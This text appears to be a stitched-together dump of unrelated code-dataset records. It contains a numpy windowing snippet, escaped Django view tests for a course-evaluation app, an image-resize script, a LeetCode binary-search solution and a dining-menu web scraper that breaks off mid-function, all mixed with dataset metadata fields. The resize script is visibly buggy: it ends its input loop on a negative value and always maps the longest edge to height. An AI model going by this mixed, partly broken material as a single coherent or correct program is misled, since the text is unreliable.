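data = np.arange(20, dtype=np.int16).reshape(10, 2)  # (observations, channels)

def multi_channel(arr, window):
    # Yield one temporal window at a time so only `window` rows are live.
    for start in range(0, arr.shape[0], window):
        stop = min(start + window, arr.shape[0])
        yield arr[start:stop], (start, stop)

for chunk, idx in multi_channel(data, window=4):
    print('Shape: {}. Index: {}'.format(chunk.shape, idx))
```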
cls.semester = mommy.make(Semester)\n cls.course1 = mommy.make(Course, name_de=\"A - Course 1\", name_en=\"B - Course 1\", semester=cls.semester)\n cls.course2 = mommy.make(Course, name_de=\"B - Course 2\", name_en=\"A - Course 2\", semester=cls.semester)\n mommy.make(Contribution, course=cls.course1, responsible=True, can_edit=True, comment_visibility=Contribution.ALL_COMMENTS)\n mommy.make(Contribution, course=cls.course2, responsible=True, can_edit=True, comment_visibility=Contribution.ALL_COMMENTS)\n\n def test_view_list_sorting(self):\n page = self.app.get(self.url, user='staff', extra_environ={'HTTP_ACCEPT_LANGUAGE': 'en'}).body.decode(\"utf-8\")\n position_course1 = page.find(\"Course 1\")\n position_course2 = page.find(\"Course 2\")\n self.assertGreater(position_course1, position_course2)\n\n page = self.app.get(self.url, user='staff', extra_environ={'HTTP_ACCEPT_LANGUAGE': 'de'}).body.decode(\"utf-8\")\n position_course1 = page.find(\"Course 1\")\n position_course2 = page.find(\"Course 2\")\n self.assertLess(position_course1, position_course2)\n\n\nclass TestSemesterExportView(ViewTest):\n url = '/staff/semester/1/export'\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n cls.semester = mommy.make(Semester)\n cls.course_type = mommy.make(CourseType)\n cls.course = mommy.make(Course, pk=1, type=cls.course_type, semester=cls.semester)\n\n def test_view_excel_file_sorted(self):\n course1 = mommy.make(Course, state='published', type=self.course_type,\n name_de='A - Course1', name_en='B - Course1', semester=self.semester)\n\n course2 = mommy.make(Course, state='published', type=self.course_type,\n name_de='B - Course2', name_en='A - Course2', semester=self.semester)\n\n mommy.make(Contribution, course=course1, responsible=True, can_edit=True, comment_visibility=Contribution.ALL_COMMENTS)\n mommy.make(Contribution, course=course2, responsible=True, can_edit=True, comment_visibility=Contribution.ALL_COMMENTS)\n\n page = self.app.get(self.url, user='staff')\n form = page.forms[\"semester-export-form\"]\n form.set('form-0-selected_course_types', 'id_form-0-selected_course_types_0')\n form.set('include_not_enough_answers', 'on')\n\n response_de = form.submit(extra_environ={'HTTP_ACCEPT_LANGUAGE': 'de'})\n response_en = form.submit(extra_environ={'HTTP_ACCEPT_LANGUAGE': 'en'})\n\n # Load responses as Excel files and check for correct sorting\n workbook = xlrd.open_workbook(file_contents=response_de.content)\n self.assertEqual(workbook.sheets()[0].row_values(0)[1], \"A - Course1\")\n self.assertEqual(workbook.sheets()[0].row_values(0)[3], \"B - Course2\")\n\n workbook = xlrd.open_workbook(file_contents=response_en.content)\n self.assertEqual(workbook.sheets()[0].row_values(0)[1], \"A - Course2\")\n self.assertEqual(workbook.sheets()[0].row_values(0)[3], \"B - Course1\")\n\n def test_view_downloads_excel_file(self):\n page = self.app.get(self.url, user='staff')\n form = page.forms[\"semester-export-form\"]\n\n # Check one course type.\n form.set('form-0-selected_course_types', 'id_form-0-selected_course_types_0')\n\n response = form.submit()\n\n # Load response as Excel file and check its heading for correctness.\n workbook = xlrd.open_workbook(file_contents=response.content)\n self.assertEqual(workbook.sheets()[0].row_values(0)[0],\n 'Evaluation {0}\\n\\n{1}'.format(self.semester.name, \", \".join([self.course_type.name])))\n\n\nclass TestSemesterCourseImportParticipantsView(ViewTest):\n 
url = \"/staff/semester/1/course/1/participant_import\"\n test_users = [\"staff\"]\n filename_valid = os.path.join(settings.BASE_DIR, \"staff/fixtures/valid_user_import.xls\")\n filename_invalid = os.path.join(settings.BASE_DIR, \"staff/fixtures/invalid_user_import.xls\")\n\n @classmethod\n def setUpTestData(cls):\n semester = mommy.make(Semester, pk=1)\n mommy.make(UserProfile, username=\"staff\", groups=[Group.objects.get(name=\"Staff\")])\n cls.course = mommy.make(Course, pk=1, semester=semester)\n\n def test_import_valid_file(self):\n page = self.app.get(self.url, user='staff')\n\n original_participant_count = self.course.participants.count()\n\n form = page.forms[\"participant-import-form\"]\n form[\"excel_file\"] = (self.filename_valid,)\n form.submit(name=\"operation\", value=\"import\")\n\n self.assertEqual(self.course.participants.count(), original_participant_count + 2)\n\n def test_import_invalid_file(self):\n page = self.app.get(self.url, user='staff')\n\n original_user_count = UserProfile.objects.count()\n\n form = page.forms[\"participant-import-form\"]\n form[\"excel_file\"] = (self.filename_invalid,)\n\n reply = form.submit(name=\"operation\", value=\"import\")\n\n self.assertContains(reply, 'Sheet "Sheet1", row 2: Email address is missing.')\n self.assertContains(reply, 'Errors occurred while parsing the input data. No data was imported.')\n\n self.assertEqual(UserProfile.objects.count(), original_user_count)\n\n def test_test_run(self):\n page = self.app.get(self.url, user='staff')\n\n original_participant_count = self.course.participants.count()\n\n form = page.forms[\"participant-import-form\"]\n form[\"excel_file\"] = (self.filename_valid,)\n form.submit(name=\"operation\", value=\"test\")\n\n self.assertEqual(self.course.participants.count(), original_participant_count)\n\n def test_suspicious_operation(self):\n page = self.app.get(self.url, user='staff')\n\n form = page.forms[\"participant-import-form\"]\n form[\"excel_file\"] = (self.filename_valid,)\n\n # Should throw SuspiciousOperation Exception.\n reply = form.submit(name=\"operation\", value=\"hackit\", expect_errors=True)\n\n self.assertEqual(reply.status_code, 400)\n\n\nclass TestCourseCommentsUpdatePublishView(WebTest):\n url = reverse(\"staff:course_comments_update_publish\")\n csrf_checks = False\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username=\"staff.user\", groups=[Group.objects.get(name=\"Staff\")])\n mommy.make(Course, pk=1)\n\n def helper(self, old_state, expected_new_state, action):\n textanswer = mommy.make(TextAnswer, state=old_state)\n response = self.app.post(self.url, {\"id\": textanswer.id, \"action\": action, \"course_id\": 1}, user=\"staff.user\")\n self.assertEqual(response.status_code, 200)\n textanswer.refresh_from_db()\n self.assertEqual(textanswer.state, expected_new_state)\n\n def test_review_actions(self):\n self.helper(TextAnswer.NOT_REVIEWED, TextAnswer.PUBLISHED, \"publish\")\n self.helper(TextAnswer.NOT_REVIEWED, TextAnswer.HIDDEN, \"hide\")\n self.helper(TextAnswer.NOT_REVIEWED, TextAnswer.PRIVATE, \"make_private\")\n self.helper(TextAnswer.PUBLISHED, TextAnswer.NOT_REVIEWED, \"unreview\")\n\n\nclass ArchivingTests(WebTest):\n\n def test_raise_403(self):\n \"\"\"\n Tests whether inaccessible views on archived semesters/courses correctly raise a 403.\n \"\"\"\n semester = mommy.make(Semester, is_archived=True)\n\n semester_url = \"/staff/semester/{}/\".format(semester.pk)\n\n self.get_assert_403(semester_url + \"import\", \"evap\")\n 
self.get_assert_403(semester_url + \"assign\", \"evap\")\n self.get_assert_403(semester_url + \"course/create\", \"evap\")\n self.get_assert_403(semester_url + \"courseoperation\", \"evap\")\n\n\nclass TestQuestionnaireNewVersionView(ViewTest):\n url = '/staff/questionnaire/2/new_version'\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n cls.name_de_orig = 'kurzer name'\n cls.name_en_orig = 'short name'\n questionnaire = mommy.make(Questionnaire, id=2, name_de=cls.name_de_orig, name_en=cls.name_en_orig)\n mommy.make(Question, questionnaire=questionnaire)\n mommy.make(UserProfile, username=\"staff\", groups=[Group.objects.get(name=\"Staff\")])\n\n def test_changes_old_title(self):\n page = self.app.get(url=self.url, user='staff')\n form = page.forms['questionnaire-form']\n\n form.submit()\n\n timestamp = datetime.date.today()\n new_name_de = '{} (until {})'.format(self.name_de_orig, str(timestamp))\n new_name_en = '{} (until {})'.format(self.name_en_orig, str(timestamp))\n\n self.assertTrue(Questionnaire.objects.filter(name_de=self.name_de_orig, name_en=self.name_en_orig).exists())\n self.assertTrue(Questionnaire.objects.filter(name_de=new_name_de, name_en=new_name_en).exists())\n\n def test_no_second_update(self):\n\n # First save.\n page = self.app.get(url=self.url, user='staff')\n form = page.forms['questionnaire-form']\n form.submit()\n\n # Second try.\n new_questionnaire = Questionnaire.objects.get(name_de=self.name_de_orig)\n page = self.app.get(url='/staff/questionnaire/{}/new_version'.format(new_questionnaire.id), user='staff')\n\n # We should get redirected back to the questionnaire index.\n self.assertEqual(page.status_code, 302) # REDIRECT\n self.assertEqual(page.location, '/staff/questionnaire/')\n\n\nclass TestSemesterRawDataExportView(ViewTest):\n url = '/staff/semester/1/raw_export'\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n cls.student_user = mommy.make(UserProfile, username='student')\n cls.semester = mommy.make(Semester)\n cls.course_type = mommy.make(CourseType, name_en=\"Type\")\n cls.course1 = mommy.make(Course, type=cls.course_type, semester=cls.semester, participants=[cls.student_user],\n voters=[cls.student_user], name_de=\"Veranstaltung 1\", name_en=\"Course 1\")\n cls.course2 = mommy.make(Course, type=cls.course_type, semester=cls.semester, participants=[cls.student_user],\n name_de=\"Veranstaltung 2\", name_en=\"Course 2\")\n mommy.make(Contribution, course=cls.course1, responsible=True, can_edit=True, comment_visibility=Contribution.ALL_COMMENTS)\n mommy.make(Contribution, course=cls.course2, responsible=True, can_edit=True, comment_visibility=Contribution.ALL_COMMENTS)\n\n def test_view_downloads_csv_file(self):\n response = self.app.get(self.url, user='staff')\n expected_content = (\n \"Name;Degrees;Type;Single result;State;#Voters;#Participants;#Comments;Average grade\\r\\n\"\n \"Course 1;;Type;False;new;1;1;0;\\r\\n\"\n \"Course 2;;Type;False;new;0;1;0;\\r\\n\"\n )\n self.assertEqual(response.content, expected_content.encode(\"utf-8\"))\n\n\nclass TestSemesterParticipationDataExportView(ViewTest):\n url = '/staff/semester/1/participation_export'\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n cls.student_user = mommy.make(UserProfile, username='student')\n cls.semester = mommy.make(Semester)\n cls.course_type = 
mommy.make(CourseType, name_en=\"Type\")\n cls.course1 = mommy.make(Course, type=cls.course_type, semester=cls.semester, participants=[cls.student_user],\n voters=[cls.student_user], name_de=\"Veranstaltung 1\", name_en=\"Course 1\", is_required_for_reward=True)\n cls.course2 = mommy.make(Course, type=cls.course_type, semester=cls.semester, participants=[cls.student_user],\n name_de=\"Veranstaltung 2\", name_en=\"Course 2\", is_required_for_reward=False)\n mommy.make(Contribution, course=cls.course1, responsible=True, can_edit=True, comment_visibility=Contribution.ALL_COMMENTS)\n mommy.make(Contribution, course=cls.course2, responsible=True, can_edit=True, comment_visibility=Contribution.ALL_COMMENTS)\n\n def test_view_downloads_csv_file(self):\n response = self.app.get(self.url, user='staff')\n expected_content = (\n \"Username;Can use reward points;#Required courses voted for;#Required courses;#Optional courses voted for;\"\n \"#Optional courses;Earned reward points\\r\\n\"\n \"student;False;1;1;0;1;False\\r\\n\")\n self.assertEqual(response.content, expected_content.encode(\"utf-8\"))\n\n\nclass TestSemesterDeleteView(ViewTest):\n url = '/staff/semester/delete'\n csrf_checks = False\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n\n def test_failure(self):\n semester = mommy.make(Semester, pk=1)\n mommy.make(Course, semester=semester, state='in_evaluation', voters=[mommy.make(UserProfile)])\n self.assertFalse(semester.can_staff_delete)\n response = self.app.post(self.url, {'semester_id': 1}, user='staff', expect_errors=True)\n self.assertEqual(response.status_code, 400)\n self.assertTrue(Semester.objects.filter(pk=1).exists())\n\n def test_success(self):\n semester = mommy.make(Semester, pk=1)\n self.assertTrue(semester.can_staff_delete)\n response = self.app.post(self.url, {'semester_id': 1}, user='staff')\n self.assertEqual(response.status_code, 200)\n self.assertFalse(Semester.objects.filter(pk=1).exists())\n\n\nclass TestCourseCreateView(ViewTest):\n url = '/staff/semester/1/course/create'\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n cls.staff_user = mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n mommy.make(Semester, pk=1)\n mommy.make(CourseType)\n mommy.make(Questionnaire, pk=1, is_for_contributors=False)\n mommy.make(Questionnaire, pk=2, is_for_contributors=True)\n\n def test_course_create(self):\n \"\"\"\n Tests the course creation view with one valid and one invalid input dataset.\n \"\"\"\n response = self.get_assert_200(\"/staff/semester/1/course/create\", \"staff\")\n form = response.forms[\"course-form\"]\n form[\"name_de\"] = \"lfo9e7bmxp1xi\"\n form[\"name_en\"] = \"asdf\"\n form[\"type\"] = 1\n form[\"degrees\"] = [\"1\"]\n form[\"vote_start_date\"] = \"02/1/2099\"\n form[\"vote_end_date\"] = \"02/1/2014\" # wrong order to get the validation error\n form[\"general_questions\"] = [\"1\"]\n\n form['contributions-TOTAL_FORMS'] = 1\n form['contributions-INITIAL_FORMS'] = 0\n form['contributions-MAX_NUM_FORMS'] = 5\n form['contributions-0-course'] = ''\n form['contributions-0-contributor'] = self.staff_user.pk\n form['contributions-0-questionnaires'] = [2]\n form['contributions-0-order'] = 0\n form['contributions-0-responsibility'] = \"RESPONSIBLE\"\n form['contributions-0-comment_visibility'] = \"ALL\"\n\n form.submit()\n self.assertFalse(Course.objects.exists())\n\n form[\"vote_start_date\"] = \"02/1/2014\"\n 
form[\"vote_end_date\"] = \"02/1/2099\" # now do it right\n\n form.submit()\n self.assertEqual(Course.objects.get().name_de, \"lfo9e7bmxp1xi\")\n\n\nclass TestSingleResultCreateView(ViewTest):\n url = '/staff/semester/1/singleresult/create'\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n cls.staff_user = mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n mommy.make(Semester, pk=1)\n mommy.make(CourseType)\n\n def test_single_result_create(self):\n \"\"\"\n Tests the single result creation view with one valid and one invalid input dataset.\n \"\"\"\n response = self.get_assert_200(self.url, \"staff\")\n form = response.forms[\"single-result-form\"]\n form[\"name_de\"] = \"qwertz\"\n form[\"name_en\"] = \"qwertz\"\n form[\"type\"] = 1\n form[\"degrees\"] = [\"1\"]\n form[\"event_date\"] = \"02/1/2014\"\n form[\"answer_1\"] = 6\n form[\"answer_3\"] = 2\n # missing responsible to get a validation error\n\n form.submit()\n self.assertFalse(Course.objects.exists())\n\n form[\"responsible\"] = self.staff_user.pk # now do it right\n\n form.submit()\n self.assertEqual(Course.objects.get().name_de, \"qwertz\")\n\n\nclass TestCourseEmailView(ViewTest):\n url = '/staff/semester/1/course/1/email'\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n semester = mommy.make(Semester, pk=1)\n participant1 = mommy.make(UserProfile, email=\"foo@example.com\")\n participant2 = mommy.make(UserProfile, email=\"bar@example.com\")\n mommy.make(Course, pk=1, semester=semester, participants=[participant1, participant2])\n\n def test_emails_are_sent(self):\n page = self.get_assert_200(self.url, user=\"staff\")\n form = page.forms[\"course-email-form\"]\n form.get(\"recipients\", index=0).checked = True # send to all participants\n form[\"subject\"] = \"asdf\"\n form[\"body\"] = \"asdf\"\n form.submit()\n\n self.assertEqual(len(mail.outbox), 2)\n\n\nclass TestQuestionnaireDeletionView(WebTest):\n url = \"/staff/questionnaire/delete\"\n csrf_checks = False\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n questionnaire1 = mommy.make(Questionnaire, pk=1)\n mommy.make(Questionnaire, pk=2)\n mommy.make(Contribution, questionnaires=[questionnaire1])\n\n def test_questionnaire_deletion(self):\n \"\"\"\n Tries to delete two questionnaires via the respective post request,\n only the second attempt should succeed.\n \"\"\"\n self.assertFalse(Questionnaire.objects.get(pk=1).can_staff_delete)\n response = self.app.post(\"/staff/questionnaire/delete\", {\"questionnaire_id\": 1}, user=\"staff\", expect_errors=True)\n self.assertEqual(response.status_code, 400)\n self.assertTrue(Questionnaire.objects.filter(pk=1).exists())\n\n self.assertTrue(Questionnaire.objects.get(pk=2).can_staff_delete)\n response = self.app.post(\"/staff/questionnaire/delete\", {\"questionnaire_id\": 2}, user=\"staff\")\n self.assertEqual(response.status_code, 200)\n self.assertFalse(Questionnaire.objects.filter(pk=2).exists())\n\n\nclass TestUserCreateView(ViewTest):\n url = \"/staff/user/create\"\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n\n def test_user_is_created(self):\n page = self.get_assert_200(self.url, \"staff\")\n form = page.forms[\"user-form\"]\n form[\"username\"] = \"mflkd862xmnbo5\"\n 
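These tests lean on model_mommy's `mommy.make()`, which auto-fills any required model fields that are not passed explicitly. A minimal sketch of the pattern, assuming a configured Django test database and the evap models used above:

```python
from model_mommy import mommy
from evap.evaluation.models import UserProfile, Course

user = mommy.make(UserProfile, username='student')  # other fields are generated
course = mommy.make(Course, participants=[user])    # M2M values can be passed inline
assert course.participants.count() == 1
```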
form[\"first_name\"] = \"asd\"\n form[\"last_name\"] = \"asd\"\n form[\"email\"] = \"a@b.de\"\n\n form.submit()\n\n self.assertEqual(UserProfile.objects.order_by(\"pk\").last().username, \"mflkd862xmnbo5\")\n\n\nclass TestTemplateEditView(ViewTest):\n url = \"/staff/template/1\"\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n\n def test_emailtemplate(self):\n \"\"\"\n Tests the emailtemplate view with one valid and one invalid input datasets.\n \"\"\"\n page = self.get_assert_200(self.url, \"staff\")\n form = page.forms[\"template-form\"]\n form[\"subject\"] = \"subject: mflkd862xmnbo5\"\n form[\"body\"] = \"body: mflkd862xmnbo5\"\n form.submit()\n\n self.assertEqual(EmailTemplate.objects.get(pk=1).body, \"body: mflkd862xmnbo5\")\n\n form[\"body\"] = \" invalid tag: {{}}\"\n form.submit()\n self.assertEqual(EmailTemplate.objects.get(pk=1).body, \"body: mflkd862xmnbo5\")\n\n\nclass TestCourseTypeView(ViewTest):\n url = \"/staff/course_types/\"\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n\n def test_page_displays_something(self):\n CourseType.objects.create(name_de='uZJcsl0rNc', name_en='uZJcsl0rNc')\n page = self.get_assert_200(self.url, user=\"staff\")\n self.assertIn('uZJcsl0rNc', page)\n\n def test_course_type_form(self):\n \"\"\"\n Adds a course type via the staff form and verifies that the type was created in the db.\n \"\"\"\n page = self.get_assert_200(self.url, user=\"staff\")\n form = page.forms[\"course-type-form\"]\n last_form_id = int(form[\"form-TOTAL_FORMS\"].value) - 1\n form[\"form-\" + str(last_form_id) + \"-name_de\"].value = \"Test\"\n form[\"form-\" + str(last_form_id) + \"-name_en\"].value = \"Test\"\n response = form.submit()\n self.assertIn(\"Successfully\", str(response))\n\n self.assertTrue(CourseType.objects.filter(name_de=\"Test\", name_en=\"Test\").exists())\n\n\nclass TestCourseTypeMergeView(ViewTest):\n url = \"/staff/course_types/1/merge/2\"\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n cls.main_type = mommy.make(CourseType, pk=1, name_en=\"A course type\")\n cls.other_type = mommy.make(CourseType, pk=2, name_en=\"Obsolete course type\")\n mommy.make(Course, type=cls.main_type)\n mommy.make(Course, type=cls.other_type)\n\n def test_merge_works(self):\n page = self.get_assert_200(self.url, user=\"staff\")\n form = page.forms[\"course-type-merge-form\"]\n response = form.submit()\n self.assertIn(\"Successfully\", str(response))\n\n self.assertFalse(CourseType.objects.filter(name_en=\"Obsolete course type\").exists())\n self.assertEqual(Course.objects.filter(type=self.main_type).count(), 2)\n for course in Course.objects.all():\n self.assertTrue(course.type == self.main_type)\n\n\nclass TestDegreeView(ViewTest):\n url = \"/staff/degrees/\"\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n\n def test_degree_form(self):\n \"\"\"\n Adds a degree via the staff form and verifies that the degree was created in the db.\n \"\"\"\n page = self.get_assert_200(self.url, user=\"staff\")\n form = page.forms[\"degree-form\"]\n last_form_id = int(form[\"form-TOTAL_FORMS\"].value) - 1\n form[\"form-\" + str(last_form_id) + \"-name_de\"].value = 
\"Test\"\n form[\"form-\" + str(last_form_id) + \"-name_en\"].value = \"Test\"\n response = form.submit()\n self.assertIn(\"Successfully\", str(response))\n\n self.assertTrue(Degree.objects.filter(name_de=\"Test\", name_en=\"Test\").exists())\n","sub_path":"evap/staff/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":26581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"607127450","text":"from PIL import Image\n\ndef resize_and_save(filename, size):\n im = Image.open(filename)\n new_im = im.resize(size)\n\n name_parts = filename.split(\".\")\n new_im.save(name_parts[0] + \"_resized.\" + name_parts[1])\n\nprint (\"How would yo liek to resize?\")\nprint (\"1) Fixed size (512x512)\")\nprint (\"2) Change to a percent\")\nprint (\"3) User input size\")\nprint (\"4) Set longest edge\")\nchoice = input (\"Enter one of the choice listed above: \")\nif (choice == \"1\"):\n resize_and_save(\"pikachu.jpg\", (512,512))\n\nelif (choice == \"2\"):\n filename = input(\"Enter a filename: \")\n im = Image.open(filename)\n old_size = im.size\n percent = input(\"Enter percent to scale to: \")\n scale = int(percent)/100.0\n new_width = int(old_size[0]*scale)\n new_height = int(old_size[1]*scale)\n new_size = (new_width, new_height)\n resize_and_save(filename, new_size)\n\nelif (choice == \"3\"):\n width = int(input (\"Enter width (pixels): \"))\n length = int(input (\"Enter length (pixels): \"))\n filename = str(input (\"Enter image filename: \"))\n size = (width, length)\n im = Image.open(filename)\n new_im = im.resize(size)\n name_parts = filename.split(\".\")\n new_im.save(name_parts[0] + \"_resized.\" + name_parts[1])\n\nelif (choice == \"4\"):\n valid = (False)\n filename = input (\"Enter image filename: \")\n im = Image.open(filename)\n old_size = im.size\n largest_side = max(im.size)\n shortest_side = min(im.size)\n while True:\n target = input(\"Enter desired pixel count of one side: \")\n try:\n val = int(target)\n if val < 0: # if not a positive int print message and ask for input again\n print(\"Sorry, input must be a positive integer, try again\")\n break\n except ValueError:\n print(\"That's not an int!\")\n ratio = (float(target)/largest_side)\n new_height = int(largest_side * ratio)\n new_width = int(shortest_side * ratio)\n new_size = (new_width, new_height)\n resize_and_save(filename, new_size)\n","sub_path":"resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"292771233","text":"#\r\n# @lc app=leetcode id=74 lang=python3\r\n#\r\n# [74] Search a 2D Matrix\r\n#\r\n# https://leetcode.com/problems/search-a-2d-matrix/description/\r\n#\r\n# algorithms\r\n# Medium (35.11%)\r\n# Likes: 964\r\n# Dislikes: 114\r\n# Total Accepted: 242.4K\r\n# Total Submissions: 689.7K\r\n# Testcase Example: '[[1,3,5,7],[10,11,16,20],[23,30,34,50]]\\n3'\r\n#\r\n# Write an efficient algorithm that searches for a value in an m x n matrix.\r\n# This matrix has the following properties:\r\n#\r\n#\r\n# Integers in each row are sorted from left to right.\r\n# The first integer of each row is greater than the last integer of the\r\n# previous row.\r\n#\r\n#\r\n# Example 1:\r\n#\r\n#\r\n# Input:\r\n# matrix = [\r\n# ⁠ [1, 3, 5, 7],\r\n# ⁠ [10, 11, 16, 20],\r\n# ⁠ [23, 30, 34, 50]\r\n# ]\r\n# target = 3\r\n# Output: true\r\n#\r\n#\r\n# Example 2:\r\n#\r\n#\r\n# Input:\r\n# matrix = [\r\n# ⁠ [1, 3, 5, 7],\r\n# ⁠ 
[10, 11, 16, 20],\r\n# ⁠ [23, 30, 34, 50]\r\n# ]\r\n# target = 13\r\n# Output: false\r\n#\r\n#\r\n\r\n\r\nclass Solution:\r\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\r\n if len(matrix) == 0 or len(matrix[0]) == 0:\r\n return False\r\n low, row, col = 0, len(matrix), len(matrix[0])\r\n high = row * col - 1\r\n while low <= high:\r\n mid = low + (high - low) // 2\r\n current = matrix[mid // col][mid % col]\r\n if current < target:\r\n low = mid + 1\r\n elif current != target:\r\n high = mid - 1\r\n else:\r\n return True\r\n return False\r\n","sub_path":"leetcode-algorithms/074. Search a 2D Matrix/74.search-a-2-d-matrix.py","file_name":"74.search-a-2-d-matrix.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"42011884","text":"#Dining Menu Web Scraper\n\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nimport sys\nfrom dining_objs import *\nimport json\nfrom database import *\nimport time\n\n\ndef get_first_child(tag):\n\treturn next(tag.children)\n\t\ndef move_down(tag, level):\n\tfor x in range(level):\n\t\tif tag == None:\n\t\t\treturn None\n\t\ttag = get_first_child(tag)\n\treturn tag\n\ndef get_page(url):\n\treq = urlopen(url)\n\treturn req.read()\n\ndef get_content_list(table):\n\t#Find the station names, stored in an
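A quick sanity check for the searchMatrix record above (assuming the Solution class is importable and that `from typing import List` is added for the annotation): the trick is treating the m x n matrix as one sorted list and mapping `mid` back to `(row, col)` via `mid // col` and `mid % col`.

```python
matrix = [[1, 3, 5, 7], [10, 11, 16, 20], [23, 30, 34, 50]]
sol = Solution()
assert sol.searchMatrix(matrix, 3) is True    # present -> True
assert sol.searchMatrix(matrix, 13) is False  # absent  -> False
assert sol.searchMatrix([], 1) is False       # empty-matrix guard
```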
<a> tag at the table's top level\n\titems = table.find_all('a', recursive=False)\n\titem_list = []\n\tfor item in items:\n\t\titem_str = str(item.string).strip()\n\t\titem_str = item_str[:len(item_str) - (2 if item_str[len(item_str) - 1] == \">\" else 0)].strip()\n\t\titem_list.append(item_str)\n\treturn item_list\n\ndef get_station_nutrition(table):\n\tnut_sections = table.find_all('div', {\"class\" : \"section\"}, recursive=False)\n\tfor x in range(len(nut_sections)):\n\t\tnut_sections[x] = move_down(nut_sections[x], 2)\n\t#Now get the nutritional information for each item:\n\tnut_list = []\n\tfor item_nuts in nut_sections:\n\t\tmy_nuts = []\n\t\t#The actual nutritional information. Pull info from \"item\" attrs\n\t\tfor nut_tag in item_nuts.children:\n\t\t\tif nut_tag.has_attr('n') and nut_tag.has_attr('v'):\n\t\t\t\tname = str(nut_tag['n']).strip()\n\t\t\t\tvalue = str(nut_tag['v']).strip().replace('Â\xa0', ' ')\n\t\t\t\t#Make sure relevant attrs have valid values\n\t\t\t\tif name != \"\" and value != \"\" and value.find(\"99999.99\") == -1:\n\t\t\t\t\tmy_nuts.append(name + \": \" + value)\n\t\tnut_list.append(my_nuts)\n\treturn nut_list\n\t\ndef get_station_menus(table):\n\t#Tables containing menu items at each station, indices correspond with station\n\tstation_tables = table.find_all('div', recursive=False)\n\tstation_menus = []\n\tfor table in station_tables:\n\t\titems = get_content_list(table)\n\t\tnutritional_info = get_station_nutrition(table)\n\t\t#Zip into a single list\n\t\titems = list(zip(items, nutritional_info))\n\t\tstation_menus.append(items)\n\treturn station_menus\n\ndef build_menu(table):\n\t\"\"\"Menu format: [[station, [item, [nutrition]]]]\"\"\"\n\tstations = get_content_list(table)\n\tstation_menus = get_station_menus(table)\n\treturn list(zip(stations, station_menus))\n\t\ndef get_menu(name, id):\n\turl = \"http://www.campusdish.com/en-US/CSMA/Virginia/Home.htm?LocationID=\" + id\n\thtml = get_page(url)\n\t\n\tsoup = BeautifulSoup(html, 'html.parser')\n\n\thas_dinner = len(soup.find_all(\"img\", id=\"DinnerICN\")) != 0\n\thas_brunch = len(soup.find_all(\"img\", id=\"BrunchICN\")) != 0\n\n\tbreakfast, brunch, lunch, dinner = None, None, None, None\n\t\n\tfirst = move_down(soup.find(\"table\", id=\"menu1\"), 2)\n\tsecond = move_down(soup.find(\"table\", id=\"menu2\"), 2)\n\tthird = move_down(soup.find(\"table\", id=\"menu3\"), 2)\n\n\t#These could be swapped based on which is present\n\tif has_dinner and not has_brunch:\n\t\tlunch = first\n\t\tdinner = second\n\t\tbreakfast = third\n\telif has_brunch and not has_dinner:\n\t\tbrunch = first\n\telif has_brunch:\n\t\tdinner = first\n\t\tbrunch = second\n\telse:\n\t\tlunch = first\n\t\tbreakfast = second\n\n\tfull_menu = []\n\n\tif lunch != None:\n\t\tfull_menu.append([\"Lunch\", build_menu(lunch)])\n\tif dinner != None:\n\t\tfull_menu.append([\"Dinner\", build_menu(dinner)])\n\tif breakfast != None:\n\t\tfull_menu.append([\"Breakfast\", build_menu(breakfast)])\n\tif brunch != None:\n\t\tfull_menu.append([\"Brunch\", build_menu(brunch)])\n\n\treturn [name, full_menu]\n\ndef pull_options(home_page):\n\tsoup = BeautifulSoup(get_page(home_page), 'html.parser')\n\tselect = soup.find(\"select\", {\"name\" : \"WucChalkboard1:findLocations\"})\n\tchildren = select.find_all(\"option\")\n\toptions_list = []\n\tfor option_tag in children:\n\t\tid = option_tag['value']\n\t\thall_name = str(option_tag.string)\n\t\toptions_list.append([hall_name, id])\n\treturn options_list\n\ndef convert_list(menu_list):\n\tdining_halls = []\n\tfor hall in 
